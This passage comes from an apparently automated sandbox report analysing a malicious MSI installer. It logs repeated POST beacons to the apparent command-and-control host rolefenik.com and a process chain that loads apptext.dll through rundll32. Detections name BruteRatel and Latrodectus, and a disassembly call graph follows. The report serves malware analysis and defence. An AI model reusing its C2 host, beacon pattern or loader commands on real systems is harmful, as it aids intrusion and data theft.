                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1267&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2188964&cwnd=251&unsent_bytes=0&cid=56aeb28e5b1c7d32&ts=2799&x=0"
                                                                                                                                                          2024-11-13 10:03:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          23192.168.2.858110172.67.191.232443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:11 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:14 UTC781INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:14 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHlncDsLTHC3bOKEVXembVsHqISqdcI8qoAKMf1bcRLpyTVSSsKihy2bljyaVKLGKYS%2FeH5T42%2BXo6FAG7%2BuqPg1Vx07M9lQ5y9nSBqjKa4wjEV73Bi7K7CTqi9DXdFq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee37cdef6b48-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1154&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=2468883&cwnd=251&unsent_bytes=0&cid=d7896248afe38d1e&ts=2713&x=0"
                                                                                                                                                          2024-11-13 10:03:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          24192.168.2.858111172.67.191.232443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:15 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:17 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:17 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SzNcPy27J3IxP3%2BvAHGouavuPSEm3QQe%2F299TyynWlGopFQlcrRJSeVRWUX7%2F4NbCFmPnEk3uYKqRVe1Mjmfanff8lAZ56Fw%2FZ1lotOWDT24gFSZWbDMmaKbdIWtZVVg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee4df8a5e5ee-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1101&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2578806&cwnd=241&unsent_bytes=0&cid=543ebae575e74569&ts=2537&x=0"
                                                                                                                                                          2024-11-13 10:03:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          25192.168.2.858112172.67.191.232443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:18 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:20 UTC788INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:20 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9E4B1iCIH53Q2wry%2FcVMcrpfYkxXOp8P47i5C3btBReGreHuynlQSJcLl8efXtQJD%2FSE8SRMFUSfxUdMv%2BOlIHiv4ur5%2FdDaJSD%2Bw%2B2%2Fy9d0lmKlLYSl5563NeH64tx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee610fd2466b-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=960&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2934143&cwnd=251&unsent_bytes=0&cid=af30a1e6de6c0e70&ts=2046&x=0"
                                                                                                                                                          2024-11-13 10:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          26192.168.2.858114172.67.191.232443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:21 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:23 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:23 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzFHSN%2BpyIRVP14CxYLOY74edMRLYPZ8bFKrLj6yLROd856UfdVoR%2F4i%2B00Okp138LVtM5UiFLO6FCeCKVAja0%2BV2KchnWuHyXM6u7d8KTdn9be7eHZDUKvsfO82rNVw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee733fc0e75e-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2542581&cwnd=251&unsent_bytes=0&cid=0a2e91729253bd23&ts=1832&x=0"
                                                                                                                                                          2024-11-13 10:03:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:04:59:15
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavi.msi"
                                                                                                                                                          Imagebase:0x7ff772ad0000
                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:04:59:16
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                          Imagebase:0x7ff772ad0000
                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:04:59:16
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6D
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:04:59:17
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\Installer\MSI2701.tmp
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object
                                                                                                                                                          Imagebase:0x4c0000
                                                                                                                                                          File size:399'328 bytes
                                                                                                                                                          MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                          Reputation:moderate
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:04:59:17
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
                                                                                                                                                          Imagebase:0x540000
                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:04:59:18
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
                                                                                                                                                          Imagebase:0x7ff653760000
                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_2, Description: Yara detected BruteRatel, Source: 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:05:00:41
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                          Imagebase:0x7ff62d7d0000
                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:1.6%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:38.3%
                                                                                                                                                            Total number of Nodes:389
                                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                                            execution_graph 33464 4e3084 33465 4e3090 CallCatchBlock 33464->33465 33490 4e2de4 33465->33490 33467 4e3097 33468 4e31ea 33467->33468 33477 4e30c1 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec ___scrt_release_startup_lock 33467->33477 33524 4e33a8 4 API calls 2 library calls 33468->33524 33470 4e31f1 33525 4f2ed9 23 API calls IsInExceptionSpec 33470->33525 33472 4e31f7 33526 4f2e9d 23 API calls IsInExceptionSpec 33472->33526 33474 4e31ff 33475 4e30e0 33476 4e3161 33501 4e34c3 GetStartupInfoW codecvt 33476->33501 33477->33475 33477->33476 33523 4f2eb3 41 API calls 4 library calls 33477->33523 33479 4e3167 33502 4ccdb0 GetCommandLineW 33479->33502 33491 4e2ded 33490->33491 33527 4e35a9 IsProcessorFeaturePresent 33491->33527 33493 4e2df9 33528 4e58dc 10 API calls 2 library calls 33493->33528 33495 4e2dfe 33496 4e2e02 33495->33496 33529 4f393e 33495->33529 33496->33467 33499 4e2e19 33499->33467 33501->33479 33503 4ccdf8 33502->33503 33588 4c1f80 LocalAlloc 33503->33588 33505 4cce09 33589 4c69a0 33505->33589 33507 4cce58 33508 4cce5c 33507->33508 33509 4cce69 33507->33509 33679 4c6600 98 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 33508->33679 33597 4cc6a0 LocalAlloc LocalAlloc 33509->33597 33512 4cce72 33598 4cc870 33512->33598 33513 4cce65 33515 4cceb0 ExitProcess 33513->33515 33519 4cce9a 33680 4ccce0 CreateFileW SetFilePointer WriteFile CloseHandle 33519->33680 33520 4ccea4 33681 4ccec0 LocalFree LocalFree 33520->33681 33523->33476 33524->33470 33525->33472 33526->33474 33527->33493 33528->33495 33533 4fbedb 33529->33533 33532 4e58fb 7 API calls 2 library calls 33532->33496 33534 4e2e0b 33533->33534 33535 4fbeeb 33533->33535 33534->33499 33534->33532 33535->33534 33537 4f6d2d 33535->33537 33538 4f6d39 CallCatchBlock 33537->33538 33549 4f1c9a EnterCriticalSection 33538->33549 33540 4f6d40 33550 4fc4cc 33540->33550 33545 4f6d59 33564 4f6c7d GetStdHandle GetFileType 33545->33564 33546 4f6d6f 33546->33535 33548 4f6d5e 33565 4f6d84 LeaveCriticalSection std::_Lockit::~_Lockit 33548->33565 33549->33540 33551 4fc4d8 CallCatchBlock 33550->33551 33552 4fc502 33551->33552 33553 4fc4e1 33551->33553 33566 4f1c9a EnterCriticalSection 33552->33566 33574 4e7370 14 API calls std::_Stodx_v2 33553->33574 33556 4fc4e6 33575 4e7017 41 API calls collate 33556->33575 33558 4f6d4f 33558->33548 33563 4f6bc7 44 API calls 33558->33563 33559 4fc50e 33562 4fc53a 33559->33562 33567 4fc41c 33559->33567 33576 4fc561 LeaveCriticalSection std::_Lockit::~_Lockit 33562->33576 33563->33545 33564->33548 33565->33546 33566->33559 33577 4f70bb 33567->33577 33569 4fc43b 33585 4f53b8 14 API calls 2 library calls 33569->33585 33570 4fc42e 33570->33569 33584 4f776f 6 API calls std::_Lockit::_Lockit 33570->33584 33572 4fc490 33572->33559 33574->33556 33575->33558 33576->33558 33583 4f70c8 std::_Locinfo::_W_Getmonths 33577->33583 33578 4f7108 33587 4e7370 14 API calls std::_Stodx_v2 33578->33587 33579 4f70f3 RtlAllocateHeap 33581 4f7106 33579->33581 33579->33583 33581->33570 33583->33578 33583->33579 33586 4fbf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 33583->33586 33584->33570 33585->33572 33586->33583 33587->33581 33588->33505 33591 4c69f2 33589->33591 33590 4c6a34 33592 4e2937 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33590->33592 33591->33590 33594 4c6a22 33591->33594 33593 4c6a42 33592->33593 33593->33507 33682 4e2937 33594->33682 33596 4c6a30 33596->33507 33597->33512 33599 4cc889 33598->33599 33601 4ccb32 33598->33601 33600 4ccb92 33599->33600 33599->33601 33690 4c6250 14 API calls 33600->33690 33605 4c6a50 33601->33605 33603 4ccba2 RegOpenKeyExW 33603->33601 33604 4ccbc0 RegQueryValueExW 33603->33604 33604->33601 33606 4c6a84 33605->33606 33607 4c6aa3 GetCurrentProcess OpenProcessToken 33605->33607 33608 4e2937 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33606->33608 33611 4c6adf 33607->33611 33612 4c6b09 33607->33612 33610 4c6a9f 33608->33610 33610->33519 33610->33520 33613 4c6af4 CloseHandle 33611->33613 33614 4c6b02 33611->33614 33691 4c5de0 33612->33691 33613->33614 33739 4c57c0 GetCurrentProcess OpenProcessToken 33614->33739 33618 4c6b2e 33622 4c6b3f 33618->33622 33623 4c6b32 33618->33623 33619 4c6b20 33621 4c1770 42 API calls 33619->33621 33620 4c6c29 33625 4c6ddb 33620->33625 33631 4c6c43 33620->33631 33621->33611 33694 4c5f40 ConvertSidToStringSidW 33622->33694 33626 4c1770 42 API calls 33623->33626 33627 4c2310 56 API calls 33625->33627 33626->33611 33629 4c6e04 33627->33629 33636 4c46f0 52 API calls 33629->33636 33678 4c6d8a 33629->33678 33744 4c2310 33631->33744 33648 4c6e29 33636->33648 33637 4c6b85 33725 4c2e60 33637->33725 33640 4c6e59 33643 4c2310 56 API calls 33640->33643 33641 4c2e60 42 API calls 33644 4c6bf5 33641->33644 33645 4c6e68 33643->33645 33731 4c1770 33644->33731 33656 4c46f0 52 API calls 33645->33656 33645->33678 33647 4c6cad 33650 4c2310 56 API calls 33647->33650 33648->33640 33826 4c4ac0 42 API calls 3 library calls 33648->33826 33654 4c6cc7 33650->33654 33652 4c6c16 CloseHandle 33652->33614 33653 4c6c7c 33653->33647 33823 4c4ac0 42 API calls 3 library calls 33653->33823 33658 4c46f0 52 API calls 33654->33658 33654->33678 33661 4c6e8a 33656->33661 33657 4c6eb9 33659 4c2310 56 API calls 33657->33659 33665 4c6ce9 33658->33665 33662 4c6ec4 33659->33662 33660 4c6d19 33663 4c2310 56 API calls 33660->33663 33661->33657 33827 4c4ac0 42 API calls 3 library calls 33661->33827 33668 4c46f0 52 API calls 33662->33668 33662->33678 33666 4c6d24 33663->33666 33665->33660 33824 4c4ac0 42 API calls 3 library calls 33665->33824 33670 4c46f0 52 API calls 33666->33670 33666->33678 33672 4c6ee6 33668->33672 33669 4c6f10 33829 4c52f0 33669->33829 33676 4c6d46 33670->33676 33672->33669 33672->33672 33828 4c4ac0 42 API calls 3 library calls 33672->33828 33673 4c6d70 33777 4c4ba0 33673->33777 33676->33673 33825 4c4ac0 42 API calls 3 library calls 33676->33825 33876 4c11d0 RaiseException Concurrency::cancel_current_task 33678->33876 33679->33513 33680->33520 33681->33515 33683 4e293f 33682->33683 33684 4e2940 IsProcessorFeaturePresent 33682->33684 33683->33596 33686 4e29a5 33684->33686 33689 4e2968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33686->33689 33688 4e2a88 33688->33596 33689->33688 33690->33603 33877 4c5e40 GetTokenInformation 33691->33877 33695 4c5fac 33694->33695 33696 4c5fd2 33694->33696 33699 4c24c0 47 API calls 33695->33699 33697 4c24c0 47 API calls 33696->33697 33698 4c5fc9 33697->33698 33700 4c5ff5 LocalFree 33698->33700 33701 4c6003 33698->33701 33699->33698 33700->33701 33702 4c24c0 33701->33702 33707 4c24d1 _LStrxfrm 33702->33707 33708 4c24fd 33702->33708 33703 4c25f5 33888 4c2770 42 API calls 33703->33888 33705 4c2515 33709 4c2566 LocalAlloc 33705->33709 33710 4c25f0 33705->33710 33706 4c25fa 33889 4e7027 41 API calls 2 library calls 33706->33889 33707->33637 33708->33703 33708->33705 33708->33710 33715 4c2582 33708->33715 33709->33706 33712 4c2577 33709->33712 33887 4c2d70 RaiseException Concurrency::cancel_current_task 33710->33887 33721 4c2593 _LStrxfrm 33712->33721 33716 4c2586 LocalAlloc 33715->33716 33715->33721 33716->33721 33721->33706 33722 4c25e5 33721->33722 33723 4c25d8 33721->33723 33722->33637 33723->33722 33724 4c25de LocalFree 33723->33724 33724->33722 33726 4c2eb7 33725->33726 33730 4c2e8d 33725->33730 33726->33641 33727 4c2eb0 LocalFree 33727->33726 33728 4c2eaa 33728->33726 33728->33727 33730->33725 33730->33728 33890 4e7027 41 API calls 2 library calls 33730->33890 33732 4c179b 33731->33732 33736 4c17c1 33731->33736 33733 4c17ba LocalFree 33732->33733 33734 4c17b4 33732->33734 33735 4c17e5 33732->33735 33733->33736 33734->33733 33734->33736 33891 4e7027 41 API calls 2 library calls 33735->33891 33736->33614 33736->33652 33740 4c57e7 GetTokenInformation 33739->33740 33741 4c57e1 33739->33741 33742 4c581e CloseHandle 33740->33742 33743 4c5816 33740->33743 33741->33620 33742->33620 33743->33742 33745 4c239c 33744->33745 33746 4c2348 33744->33746 33748 4c2427 33745->33748 33895 4e2c98 6 API calls 33745->33895 33892 4e2c98 6 API calls 33746->33892 33748->33678 33759 4c46f0 33748->33759 33749 4c2352 33749->33745 33751 4c235e GetProcessHeap 33749->33751 33893 4e2faa 44 API calls 33751->33893 33752 4c23b6 33752->33748 33896 4e2faa 44 API calls 33752->33896 33754 4c238b 33894 4e2c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33754->33894 33757 4c2416 33897 4e2c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33757->33897 33760 4c4766 33759->33760 33761 4c4700 33759->33761 33760->33653 33761->33760 33898 4cd156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33761->33898 33763 4c4730 FindResourceExW 33766 4c471a 33763->33766 33766->33760 33766->33763 33767 4c4771 33766->33767 33899 4c45b0 LoadResource LockResource SizeofResource 33766->33899 33900 4cd156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33766->33900 33767->33760 33768 4c4775 FindResourceW 33767->33768 33768->33760 33769 4c4783 33768->33769 33901 4c45b0 LoadResource LockResource SizeofResource 33769->33901 33771 4c4790 33771->33760 33902 4e7383 41 API calls 3 library calls 33771->33902 33773 4c47d1 33774 4c47e2 33773->33774 33903 4c11d0 RaiseException Concurrency::cancel_current_task 33773->33903 33774->33653 33778 4c57c0 4 API calls 33777->33778 33779 4c4bed 33778->33779 33780 4c4c15 CoInitialize CoCreateInstance 33779->33780 33781 4c4bf3 33779->33781 33783 4c4c4f 33780->33783 33784 4c4c58 VariantInit 33780->33784 33782 4c52f0 89 API calls 33781->33782 33785 4c4c0d 33782->33785 33783->33785 33787 4c5187 CoUninitialize 33783->33787 33786 4c4c9e 33784->33786 33788 4e2937 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33785->33788 33789 4c4cb1 IUnknown_QueryService 33786->33789 33796 4c4ca8 VariantClear 33786->33796 33787->33785 33790 4c51a7 33788->33790 33792 4c4ce0 33789->33792 33789->33796 33790->33678 33793 4c4d31 IUnknown_QueryInterface_Proxy 33792->33793 33792->33796 33794 4c4d5a 33793->33794 33793->33796 33795 4c4d7f IUnknown_QueryInterface_Proxy 33794->33795 33794->33796 33795->33796 33797 4c4da8 CoAllowSetForegroundWindow 33795->33797 33796->33783 33798 4c4e28 SysAllocString 33797->33798 33799 4c4dc2 SysAllocString 33797->33799 33798->33799 33800 4c51b0 _com_issue_error 33798->33800 33802 4c4def 33799->33802 33803 4c4df8 SysAllocString 33799->33803 33908 4c11d0 RaiseException Concurrency::cancel_current_task 33800->33908 33802->33800 33802->33803 33805 4c4e3d VariantInit 33803->33805 33806 4c4e1d 33803->33806 33810 4c4ebd 33805->33810 33806->33800 33806->33805 33808 4c4ec1 VariantClear VariantClear VariantClear VariantClear SysFreeString 33808->33796 33810->33808 33813 4c4f1b 33810->33813 33811 4c24c0 47 API calls 33811->33813 33813->33808 33813->33810 33813->33811 33815 4c2e60 42 API calls 33813->33815 33816 4c4fd5 OpenProcess WaitForSingleObject 33813->33816 33819 4c5025 CloseHandle 33813->33819 33820 4c51ab 33813->33820 33821 4c506e LocalFree 33813->33821 33904 4c12f0 49 API calls 2 library calls 33813->33904 33905 4c3860 99 API calls 2 library calls 33813->33905 33906 4c4270 10 API calls 33813->33906 33815->33813 33816->33813 33818 4c500b GetExitCodeProcess 33816->33818 33818->33813 33819->33813 33907 4e7027 41 API calls 2 library calls 33820->33907 33821->33813 33823->33647 33824->33660 33825->33673 33826->33640 33827->33657 33828->33669 33830 4c5361 33829->33830 33909 4c5d30 33830->33909 33832 4c537b 33833 4c5d30 41 API calls 33832->33833 33834 4c538b 33833->33834 33913 4c59c0 33834->33913 33836 4c57b0 33932 4c11d0 RaiseException Concurrency::cancel_current_task 33836->33932 33838 4c539b 33838->33836 33921 4e7852 33838->33921 33842 4c53e1 33843 4c5d30 41 API calls 33842->33843 33855 4c53f5 33843->33855 33844 4c551d GetForegroundWindow 33875 